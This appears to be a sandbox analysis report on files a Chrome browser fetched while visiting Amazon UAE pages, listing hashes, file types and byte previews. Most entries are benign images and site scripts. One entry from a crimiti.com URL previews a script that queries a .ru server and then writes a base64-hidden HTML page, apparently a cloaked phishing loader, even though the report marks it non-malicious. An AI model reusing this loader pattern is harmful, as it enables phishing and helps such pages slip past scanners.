                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DAPAVCQJMFK78QJEV1PMZ%26ue%3D71%26bb%3D1641%26ns%3D1859%26ne%3D1941%26cf%3D1951%26be%3D2330%26fp%3D1937%26fcp%3D1937%26af%3D8027%26fn%3D8027%26pc%3D49200%26tc%3D-1269%26na_%3D-1269%26ul_%3D-1724264919194%26_ul%3D-1724264919194%26rd_%3D-1724264919194%26_rd%3D-1724264919194%26fe_%3D-1235%26lk_%3D-1192%26_lk%3D-1192%26co_%3D-1192%26_co%3D-384%26sc_%3D-1191%26rq_%3D-384%26rs_%3D-47%26_rs%3D578%26dl_%3D-40%26di_%3D2363%26de_%3D2363%26_de%3D2364%26_dc%3D49199%26ld_%3D49199%26_ld%3D-1724264919194%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D68%26hoe%3D71%26ld%3D49200%26t%3D1724264968394%26ctb%3D1%26rt%3Dcf%3A10-2-4-4-2-0-1_af%3A73-2-5-56-5-0-1_ld%3A247-11-8-211-8-2-0%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26ui%3D2%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9650
                                                                                                                                                                                                                                                                      Entropy (8bit):7.921401363311506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:XWYnxO4SOPdbw3eIIjALWOIg1Sxk7SufiOIEUvpb2B15giRRIWAjLBo+2S:XtnxOtO1KvIjALW1xkeZOIvkBQ3d+S
                                                                                                                                                                                                                                                                      MD5:BF7838B60D41AC5866F8DE735215FC8B
                                                                                                                                                                                                                                                                      SHA1:35A30A074555C1E01F489B5C28AC91F1708CC3C7
                                                                                                                                                                                                                                                                      SHA-256:FAA13D8245F7116DD8E9B46B57FD4B0D732DEB6FB14507D9DA6785EC907416D6
                                                                                                                                                                                                                                                                      SHA-512:57A32571D6AA2E7321FE116267446783E7D21CF61177428B056991493A31B6DB781238FEDE835D5CDEBCA20A1AF34BB9EC7C0A11917855D06A00020860F8FB9C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/611NR29KK3L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5......................................................................eF.0.......F8.9..]...Z....4./.|.F.=)..}!...qe..<.0. ..Q..N5y.R].....,O=T7U...O.qz.}...F..}V..C..'.....d.%\..c=_...31}[.\..O.....B.`..Y&..E.r.zE.u.....c..v.>s.+[...GF...o.%....2K...eh.U?<U.[x...U/....oE.{.Z....m..l.&(d}...M7.<.....6>.?..f.}|.......m....'.j.M.._.J.SZ.{._...YW...'R.....{.cT.....V@^~...9.cm3..2...2...R'S5lt.C|...]..{/Yc.:.I.6F..w... F..?..l..e`v3m_fG;..W.O.{m.JU"....f.ar.a$..9w...K......K.....P.a.].].Nw.e........@9.G.......9.....<..b.wGF........m{.....l...e..{...B.S................2.\1.m...]|..P<.s..$q.-T.q@..N..|[|`........8.[....n...o.m.lZ..|2.......,.6..7.Gs.0..gl..y..y........d.....N..z.:.....Fd.z...\.Y.KX..P.)D/g./..2...]b.}E..B"..S.C..|.T.Mo.X].54K.vl|..N...b...j......J.2M..U.?X.....;#G..7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4642
                                                                                                                                                                                                                                                                      Entropy (8bit):7.920986044399299
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7dF8GWWV+w/xxV+6X8mbsrTW4sR72Y+JENUoVbu:JFEPw/j/0TYRSxJ+a
                                                                                                                                                                                                                                                                      MD5:5AAEB8DD8F1332112BB72F6AD63E773B
                                                                                                                                                                                                                                                                      SHA1:758513490AE29119946307C1BFEC15BCCE2715C6
                                                                                                                                                                                                                                                                      SHA-256:CD501BCEE39A686988130F30DFED2BD8F5BE82C17977C5114114BD94E8290B4B
                                                                                                                                                                                                                                                                      SHA-512:0723AACCF035AD63B726C04E3B870D274C997219D9A6979C11298188445A5EA3380EA9183BDE2471606CDED67F43AB8A2A6194876184FA8FF658BB82ECDB4BA1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE._SY116_CB567106849_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."..............................................................!..1..AQ2aq..."BRS.....#bs......3T.$....4rt..................................................!1...Qq..Aa.."2...#$R..Tbr................?..dRH...+..).U.*.)..0..O.[.[..R...,....J...r...~.Ss.o.}.....uhB..T..........<6.j.\...|u..>=.."~./.nIl...:...J..-...I$x.m........-..}7W.g.....u.........|2v..{3...I.g89..o...s$........-{..[R...X......X'......w..%.H......cL.....f.P....&........?|.........._....%sm...1{S..h?R..9.....j....24..J/W.|.>g..^:...z....]..."g.*T..O.;.1....i..41..m;..8[....U<B*.}.Z....Q$...u.........n%.\..~#.:Y6.q.:.......#..mD|w.H..`Yw.Ad#m..6...Mg.:dx..%..d.`.+....5cK.VM..N....{u...v.[=..X......o.%6...U..K.`e.."..8.?...m....}.YW\y.Z..{...ut...3Z.:..$.]4e....}f.._.N..n..C.I...k.b.I....@.....#>..V.w..t.x.a..[....W..I.v.$
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2828%26pc%3D9603%26at%3D9603%26t%3D1724264976443%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:9602
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43035
                                                                                                                                                                                                                                                                      Entropy (8bit):7.934677596166583
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyDrz5nZ8lyC6sCowenpT8xpphnevbs6o+seP8+gxBAFWKNhv7QhrUAFLe1gRaF:4xCly0CowenpTGf6o9e0xBiW8v0RJsue
                                                                                                                                                                                                                                                                      MD5:80FA247C4B70291638CCF3D72A421E4D
                                                                                                                                                                                                                                                                      SHA1:C82DEC2B7B7594A830637A0F6F1C8CAB0180F505
                                                                                                                                                                                                                                                                      SHA-256:A4785DD397DB26B9986DA2C4B7976F5A97AE97C0579CCD183F45A8B7672F4A5E
                                                                                                                                                                                                                                                                      SHA-512:7EBA080D1ED87D884AD43C41C6469E7CC8663530B6732C2EC2ECF2589854C0AB36EBDC0894CDCF4CA613A230565823D852455D8E53B3832C9EE72363EE17E59B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 512 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):22428
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910842269862625
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:qlbGl6f7R7T7rLr3s96g/W1BapndUdH6Qu3pDm+RaHHhKTOl1uk5xs:Lm7R7r/3pWW6pnudH6Qu5CZhKTA0+i
                                                                                                                                                                                                                                                                      MD5:BE418CBD22D8CD432FD8F3F6AE2ABD76
                                                                                                                                                                                                                                                                      SHA1:8A1EB36BDA141942C27CE5F2586CCB5EE17A2DA3
                                                                                                                                                                                                                                                                      SHA-256:F95648CD95B78DE088904519725C67FFF220F589DC045F19FFBA21550450409F
                                                                                                                                                                                                                                                                      SHA-512:85A442470444250A639C86753F1E9D3DC8C308D9F173C250CFEDACD8A1E16F4E3419DA0C7A6F19695CF6D1C25964B54E4FEE4193EED183B41C9E6043BDB827E8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............N>U....PLTEGpL................79.78....... ;.(=..........+m.2I..;..$.qI.4:....%<. ;hjjcdehkkfiifiifhh.....@2?..?T..gjj...H.*l.O..>...O./;.2...ARB..............>N....>............:..D.).......................T..U$..(../.. ..$..$................*..,...........$..#..#..#..#..$..#..#..#........#..$..&............)}.)}.)}.)}.)}.)}.)}.)}.)}.)}.JI..H..K..K...<..vH..H...<...$*/......@@@...)1<......BGL...RUX...mxx.........`..K...<.E...%..C..X.D..w........<....uR.-<>A#/>:?C"$';>A;?C...-8D<?C8>C>@C$..............:>B;@D......&{..p.;...........$........................i......@?._I..W.....Q.G6.G6.G6.H6..-.ul.`.6d...........................................?@A?@A...3>H......V........#...vg.8!."....'..7.....@.....D..%.f%.f....^..]..].;........(......].......g...hV....tRNS.....sy..V..*..!1d..L...;.\v..D.....o.yo.N..o..'\.<{3...5..a..?...X(.......H.7P..h.........w....t....[..B...........................h...............*.`...@.....qQ......1.I..we..\....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (531)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1406
                                                                                                                                                                                                                                                                      Entropy (8bit):5.225394152309612
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:2T/sWFxVPIVq4pgY2Gq4pGBq4pA6ZfLZq2G97doVl6yeIIr5s66TU0ttoO:IFxu98BLPGRdoV8yeImf6TB9
                                                                                                                                                                                                                                                                      MD5:58F0FEDF5D8FC4BFA2E0841607D6EF40
                                                                                                                                                                                                                                                                      SHA1:CB25320DC51C8EC3E664057F39ACD4829D0FEBE2
                                                                                                                                                                                                                                                                      SHA-256:8D1569345AA7C0E58BE0571BA51676058515949F2BAE328D9D0A3304F73D8E31
                                                                                                                                                                                                                                                                      SHA-512:061CCDF6C8994CFD70BF137B6899C850AFBA8A9B78563FB069361D0A7C190650E42A17A3448DDFA179B32A0D7417F8D48F77B6E5DD7CB0A8CCC4E127F78B3227
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(d){var c=window.AmazonUIPageJS||window.P,g=c._namespace||c.attributeErrors,a=g?g("OctopusBrowsePageAssets",""):c;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,c,g){d.when("jQuery","ready").execute("apb-browse-refinements-checkbox-handler",function(a){a(".apb-browse-refinements").delegate(".apb-browse-refinements-checkbox","click",function(d){var b=a(d.currentTarget).closest("a").attr("href");b&&"#"!==b&&(d.preventDefault(),c.location.href=b)})});."use strict";d.when("A","jQuery","ready").execute("s-filters-declarative-action",function(a,d){a.declarative("s-nav-ref-image-layout-hover","mouseenter mouseleave",function(b){var f=b&&b.data,e=d(":first-child",b&&b.$currentTarget),a=null,c=null;b=b||{};"mouseenter"===b.type?(a=f.hoverOffsetX,c=f.hoverOffsetY):"mouseleave"===b.type&&(a=f.offsetX,c=f.offsetY);null!==a&&e.css("background-position",[a,"px ",c,"px"].join(""))})});"use strict";d.when("A","GLUXWidget").execute(function(a,d){a.on("pa
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4933
                                                                                                                                                                                                                                                                      Entropy (8bit):7.782471391591208
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TmEd+sCZND48jiSqpcidDQnzt7v3QWxiCADViW3YABKn2X7hX/7Zi7BvHOVWR:Cc+sCHDri7ptdDQl3QWC5iobKMR7Z0BL
                                                                                                                                                                                                                                                                      MD5:A7009FA7340040473654A4EC7DCBB530
                                                                                                                                                                                                                                                                      SHA1:FB3A0EC4C99D17B3B9B3477C1F9C8C7EF32DD840
                                                                                                                                                                                                                                                                      SHA-256:7298301B10FA4E95EB5956735415AEADB8DD5C27F23495E4186CFE32F60B97B2
                                                                                                                                                                                                                                                                      SHA-512:B35B09D3ADBC8A62D48EAAFEDDE19F55A98EA327E1E1905043D6DB89BDB3445FF0B7647BB1FC80A4B44C445731F9BE87A3685C5874184050ADDE7AD1DA766AA6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3........................................................................................>}...r)s[|..N...K'{....~..n.}.Of.4/........W.......f!.j..i.%..f.3....7a...r]..?F:.0....:.M!...e_....j.j.r.._%.x..V..Y.&y....;..nn..7.A.....).:Q.^,......i.F......#....i..r.$-..a.o.....<z.p.....=b.x../..:D.=$...lS.T!..U......3=.t.b..sw.[ .......`.,...-.r.O..n|k?...jg..kF...>...:..>qtw.......,R...]..._!..-]d.......{.@..rE..u.VN?..OM?....s.....9.....'.....if.W-......C.x*..|....\.6.H......e.,Se!..iN..?7)......y.R.cG.n..X....>....[./7zE ....Z.H..8....F.7.h..F...h.......(............................,...............................!014"3#$2pA................Ar.....a.".i.sX.....(.G5.9.Q.#.i.%D......,.UL.22Y.8.r..C.9+.......@.(#%.d...!..2pG-..F.Dr*..e../p{.;\RV.[s..N.'.'.:J..?.=..3H8...I......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (5729), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6090
                                                                                                                                                                                                                                                                      Entropy (8bit):5.884869284566958
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:oqbhj/n3ws2kdbLGHLPdp/ra5Z1X6x8teCVJYJBwAh5PuNVvCjmboNi/jvhCHBlA:oqbhznoklMPd45Z1X6xOhV2+vjoSZCBe
                                                                                                                                                                                                                                                                      MD5:6A8431EB73F0E534F6EEC26E7C0DD0DB
                                                                                                                                                                                                                                                                      SHA1:D616B898D271519C3A7F68386E6A37718491EDD2
                                                                                                                                                                                                                                                                      SHA-256:49B2660E9013D28625D9E2159239121A18197558159A3CC2C2C171731E2B71D5
                                                                                                                                                                                                                                                                      SHA-512:5F38CAC74361D7C86EC63198ADC94FADDA248E8690D2AF55E768542B8D0A48A2C88EABCF6644394A9A57CC386906AFB5CE3A288101C166804314F39215E4DDBD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://7czh8.crimiti.com/3aqy/
                                                                                                                                                                                                                                                                      Preview:<script>fetch('https://Ghd.dultzman.ru/lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){ ..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+eXJ3T0RxZUxFdE44Y0FpWDwvdGl0bGU+DQogICAgPHN0eWxlP
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x280, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11908
                                                                                                                                                                                                                                                                      Entropy (8bit):7.925960204090454
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1k9PIUB4eAv5OARSrvRxcQAh7RCnY0Dd7fLXt0arymmLIKXj02jgbDMbnHoid7eO:1k9RiBv563c57R0DVfLjcMKXj/g/knJL
                                                                                                                                                                                                                                                                      MD5:697678BEB8816F64EF06E0FCC650E45E
                                                                                                                                                                                                                                                                      SHA1:55C5A63D3005FE742D53B8F50F1300F9AE8315CD
                                                                                                                                                                                                                                                                      SHA-256:132FF92F46031C15DD8DCFE1A290D67B065FF83691FEAA38234DBEB6F0A22949
                                                                                                                                                                                                                                                                      SHA-512:4ECC2F72F2E72CCB367E1CA7BFD534672080E1A3BC552DE711A7BFBE741C0AA248FAD5554D9B0EB6BE658C55F8477F03A89916B780F4A9BC63A6AE79DE7F9E1C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Price-U299-440x280.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................@.................$.I...}...n........y.1, ..M......0k......X......Z.....{X.fP...R.....+.b....YY......l.....<....Uwf..b.Q......}f...D.m..{.......G|.....^Y...C..oKnY._ ....@....].....Z...N}......}l!..._ZA.-.(..s.0...P...szs.G.7%Y..W..BeJ.d_...w .B..[..Z..A.Nl.:B.....S0.Nc..&...{.>.....OM..Tu.T.&.Kso....D....T.......................{`W4.........".........../....l.....`......?Q..p.-..\. .4.i........=.iH4......)B.#.d"#...r/.SS/..[J.e.:...6.......O........{f...U.^^......]g4....4..Ya]...S..\....t.r..-.7]V5.hI9....t....k.$........k...^.X.!............X...t_......"}.._#....a.....yBh=.O.9[....5.R....s..<F...Ma4.rY..B.........E.U@........C..k.e[....G..nb......=V.m."..].][O}....6..a....td...o...J......}.9....`....e...x..F....!.3.........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8370
                                                                                                                                                                                                                                                                      Entropy (8bit):7.944534208073143
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:WX7n9ZQ6xbiaJhUTXPuUSX0+anUmqPQFmhhrOmAPEJppdt:67n96kO9joUn4oFmKmAMDpX
                                                                                                                                                                                                                                                                      MD5:CF7EA177E76943BE1949322CE3923DE1
                                                                                                                                                                                                                                                                      SHA1:88752E6771BD6FCA4877CA856CD88F129902681E
                                                                                                                                                                                                                                                                      SHA-256:97FA24F6ECD9127F28EEB465BA1D9CEDC6A7674C12FD2EF785C5E422248841BA
                                                                                                                                                                                                                                                                      SHA-512:0F1F9D7CC8C4B4C2A561573001E3088B62984140C40C046E42D05F93BDD2BDC1DA0C954E957E0D8F3B6107AFB83C0FCC87D7F7805A68B904B71DE10A3598349D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/618LrXHTM3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1A."Q.2aq...#BRrst....$6C..&45.%Sbceu....................................................!1.."2AQa..3q.....4b...............?..t._v{B.._P...b.y.|0DN..a.JG.%..Q\Xh....Ye... .......K.\.#..5q.h.V......x-t...5.O7....F......<...zt.r...o,.J.......|...H.(.F\..l..s[p].U....^.O...\+.i..~D!...).....O..69..[.Z.D..X.0.....Ts=-.E..r..Rp+.y....+q..F~.u...-^a.t..Pr....;.0b...8....a.z.....i.qqg!..i=.C..2..b.rGc.J......6...I'.Q..+..j..k..O?....4U...N...+0PDq.K....S.k.@_..kM%;Zi...+....WRoi.b..-...~..]...H.EQ.W~.Q.....ps...w[.........[8.ck+.$.......V..-m..B.TO{....3:....I97.O..Q..........o.-.f..wsX]5..r.it.........l6w.ZF..i.b..........S..5..._....Q.l..Jve...Uz.W...l\..w......A.,.*..JR.R....(.)J....t.o}.... /.dJ..F.9bhI'........#>..m.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 159x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8643
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954847591742441
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lUA659Oi82/JAla6j7UI1hDmfDcxaJwuxeby:F65s1G6v1hDmLcxaSWeG
                                                                                                                                                                                                                                                                      MD5:F1F287CD7009F99CD5D29933E72FC8FF
                                                                                                                                                                                                                                                                      SHA1:88CAADD7E408D88BB515D2FCA9AB198295D17FAD
                                                                                                                                                                                                                                                                      SHA-256:BD8FDAC2A800C4F74DAF25B03C77CF113E1F6D17573139E4DD7A6F01E368840B
                                                                                                                                                                                                                                                                      SHA-512:02CB4F388330C27D1C48D9AAFDCA8D1AE1A3155A464DE3AE43CE3089CC9E4372C099F0D0E85A235A74BC32FFC17D9FD8D4821DC311F75BBE8FFA5C2C9D2F1FDF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71s0nbDCiDL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ2aq...#TU..6Bt.........%RSbdr....Ee..&'4CDcsu.....................................................1Q!..."2Aq..a..#B............?......K.=$2.VNXV.ap...~..*...p..Q.G.....o......w.q,.-....J.M...Y....!..6..IEtb.6.vM...T.......W+a.o.5...\.....c.6".?..aY.e.."..btG3B.Aux..nG.+ *H...f1.....#.[...".{p.>..6................./.$..Q............s..SJ..}.r..g".......k.7L....m.{S....<....z.^..i..[.~......L.)*.f.VIDQ......-..B.........J.J:.!r.\..W-.'...u#p/..Dm.l.Y~yU....u..u>......y.]A...7...yr....z.}.F....]..#..O...x...uS.R~....zq;...]....U.h....,Z.~.^..o..j}.o..B1..w!.].Q.|.....\.....{....m.....=....~....yB.......T......<#.+..Hmc..<..3.Z..U.^.6......fi......y..9fj..8.t...:.)R.i ..q.a.*xI......scHT..yt..IS.Q.$.%(.HR.V...@w .*
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14256
                                                                                                                                                                                                                                                                      Entropy (8bit):7.935047719221589
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:lxTA3vdo5DGwFf8U5JHP0gRUTKDrbymGanXyR5LdY/JBO:lxTAcGS0g6gRU+DK2nX02/JE
                                                                                                                                                                                                                                                                      MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                                                                                                                      SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                                                                                                                      SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
